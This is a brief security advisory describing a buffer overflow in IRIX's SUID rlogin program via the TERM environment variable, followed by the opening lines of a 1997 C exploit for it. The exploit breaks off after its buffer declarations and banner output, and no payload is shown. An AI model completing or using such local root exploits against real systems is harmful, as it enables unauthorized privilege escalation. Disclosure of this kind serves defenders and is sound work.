The SUID rlogin program is used to establish remote sessions. A buffer overflow condition has been found in the rlogin program that may allow an unauthorized user to gain root access. The overflow in particular is in the rlogin code that handles the TERM enviroment variable. Similar bugs have been known to exist in some telnetd implementations.
NOTE:
The vulnerability was updated august 2, 2000 to reflect certain versions of IRIX to be vulnerable.
/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/
/*## /usr/bsd/rlogin #*/
main(int argc,char **argv){
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n");
printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n");